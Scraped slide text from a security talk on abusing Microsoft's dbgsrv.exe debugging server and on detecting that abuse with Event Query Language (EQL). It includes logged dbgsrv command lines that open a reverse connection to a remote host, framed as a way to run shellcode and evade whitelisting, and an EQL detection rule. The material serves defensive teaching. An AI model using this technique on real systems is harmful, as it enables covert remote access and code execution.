pid event_type subtype parent_process_name command_line destination 7268 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=10.10.10.129,port=22 7268 network outgoing 10.10.10.129 7268 process terminate 4956 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe -t tcp:clicon=remotedebug.msdn.azure.com,port=22 8044 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22 2680 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22 2680 network outgoing 10.10.10.129 nota vocatio What else did dbgsrv.exe do?
destination port process_path user_name 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander novum nexumus ✘ New technique?
DBGSRV: A Fantastic Red-Team Attack Think of this tool as giving you what is functionally equivalent to ● Reverse TCP Connection ● Process Hollowing ● Whitelist Evasion Disclosed to MSRC, cleared for disclosure. - It is a binary working as designed. It is not an exploit.
DBGSRV : Reverse TCP Connection MSDN DbgSrv Command-Line Options
DBGSRV : Deliver Shellcode & Execute
DEMO
DBGSRV: Detection ATT&CK T1127: Trusted Developer Utilities sequence [process where subtype.create and (process_name == "dbgsrv.exe" or original_file_name == "dbgsrv.exe") ] by unique_pid [network where subtype.outgoing] by unique_pid [process where subtype.create] by unique_ppid
Automate It
EQL Analytics Library ● Library of 100+ detections written in EQL ● Mapped to ATT&CK tactics and techniques ○ Automatically updated coverage ● Abstracted from specific data sources ○ Provide a mapping to your fields ○ Sysmon already implemented eqllib.readthedocs.io
EQL Analytics Library [analytic.metadata] categories = ["detect"] confidence = "medium" contributors = ["Endgame"] created_date = "08/08/2019" description = "Detect dbgsrv.exe used to launch remote debuggers as a potential remote access tool" id = "70814733-e756-4eda-8840-5e16c49304f6" name = "DbgSrv Remote Debugger" os = ["windows"] tactics = ["Execution"] techniques = ["T1127"] updated_date = "08/08/2019" [analytic] query = ''' sequence [process where subtype.create and (process_name == "dbgsrv.exe" or original_file_name == "dbgsrv.exe")] by unique_pid [network where subtype.outgoing] by unique_pid [process where subtype.create] by unique_ppid '''
Survey Says ==================================================================== count analytic_name ==================================================================== 1 Installation of Browser Extensions 1 Process Discovery 1 RegSvr32 Scriptlet Execution 1 Suspicious Script Object Execution 1 System Owner and User Discovery 2 Creation of Scheduled Task 2 Network Service Scanning via Port Scanning 2 Windows Discovery of Network Environment via Built-in Tools 3 Execution of Existing Service via Command 3 InstallUtil Process 6 Control Panel Items 6 Indicator Removal on Host 6 Stop Services with sc.exe 12 Windows System Information Discovery $ eqllib survey -f mydata.json.gz -c
Identifying True Positives ● Build a baseline of your environment ● What do you find multiple times? ○ Track repeat offenders ○ Both installutil.exe and dbgsrv.exe triggered multiple detections Does it tell a story?
Pitfalls of Behavioral Detection ● False positives from administrators and background software ○ Watch your ratio of false to true positives ● Lack of context to improve detections ○ True positives rarely occur in isolation ● Waiting for a red team to test posture ● Knee-jerk reactions to trending malware
Key Takeaways
Install and configure Microsoft Sysmon on a Windows endpoint Detonate an Atomic Test to generate events Collect events as a JSON file using PowerShell Install Python then download EQL pip install eql Load the EQL shell with the command eql Load your data file within the shell input -f my_sysmon_logs.json DIY Red & Blue team
Conclusion ● Understand what data sources you have ● Focus on commonly seen behaviors ● Practice on small known sets then scale up ● Test early, test often ● Know your resources ● Share with the community!
Resources ● MITRE ATT&CK attack.mitre.org ● Atomic Red Team atomicredteam.io ● Event Query Language eql.readthedocs.io ● EQL Analytics Library eqllib.readthedocs.io bit.ly/fantastic19
Thank You A number of people helped us along the way. Paul Ewing Devon Kerr Mike Haag Adam Shostack - BlackHat Speaker Coach
Fantastic Red Team Attacks and How to Find Them

Empfohlen

The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 

Empfohlen

The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageRoss Wolf
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!treyka
 

Weitere ähnliche Inhalte

Was ist angesagt?

Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...MITRE ATT&CK
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01Michael Gough
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016Matthew Dunwoody
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshopprithaaash
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopDigit Oktavianto
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheetMichael Gough
 

Was ist angesagt? (20)

Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016No Easy Breach DerbyCon 2016
No Easy Breach DerbyCon 2016
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your Network
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Adversary Emulation Workshop
Adversary Emulation WorkshopAdversary Emulation Workshop
Adversary Emulation Workshop
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Windows logging cheat sheet
Windows logging cheat sheetWindows logging cheat sheet
Windows logging cheat sheet
 

Ähnlich wie Fantastic Red Team Attacks and How to Find Them

Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...MITRE ATT&CK
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!treyka
 
Web application security and Python security best practices
Web application security and Python security best practicesWeb application security and Python security best practices
Web application security and Python security best practicesPGS Software S.A.
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Andrew Case
 
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunk
 
how-to-bypass-AM-PPL
how-to-bypass-AM-PPLhow-to-bypass-AM-PPL
how-to-bypass-AM-PPLnitinscribd
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positivesElasticsearch
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsElasticsearch
 
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...NoNameCon
 
PyCon AU 2012 - Debugging Live Python Web Applications
PyCon AU 2012 - Debugging Live Python Web ApplicationsPyCon AU 2012 - Debugging Live Python Web Applications
PyCon AU 2012 - Debugging Live Python Web ApplicationsGraham Dumpleton
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positives Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesElasticsearch
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingCTruncer
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleGuardicore
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosImma Valls Bernaus
 
10 Tips for AIX Security
10 Tips for AIX Security10 Tips for AIX Security
10 Tips for AIX SecurityHelpSystems
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosElasticsearch
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malwarePedro Tavares
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosElasticsearch
 

Ähnlich wie Fantastic Red Team Attacks and How to Find Them (20)

Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
Would you Rather Have Telemetry into 2 Attacks or 20? An Insight Into Highly ...
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!
 
Web application security and Python security best practices
Web application security and Python security best practicesWeb application security and Python security best practices
Web application security and Python security best practices
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security WorkshopSplunkLive! Washington DC May 2013 - Splunk Security Workshop
SplunkLive! Washington DC May 2013 - Splunk Security Workshop
 
how-to-bypass-AM-PPL
how-to-bypass-AM-PPLhow-to-bypass-AM-PPL
how-to-bypass-AM-PPL
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifs
 
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...
Nazar Tymoshyk et al - Night in Defense Workshop: Hunting for a needle in a h...
 
PyCon AU 2012 - Debugging Live Python Web Applications
PyCon AU 2012 - Debugging Live Python Web ApplicationsPyCon AU 2012 - Debugging Live Python Web Applications
PyCon AU 2012 - Debugging Live Python Web Applications
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positives Automate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
Conclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at ScaleConclusions from Tracking Server Attacks at Scale
Conclusions from Tracking Server Attacks at Scale
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
10 Tips for AIX Security
10 Tips for AIX Security10 Tips for AIX Security
10 Tips for AIX Security
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivos
 
Strategies to design FUD malware
Strategies to design FUD malwareStrategies to design FUD malware
Strategies to design FUD malware
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivos
 

Kürzlich hochgeladen

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
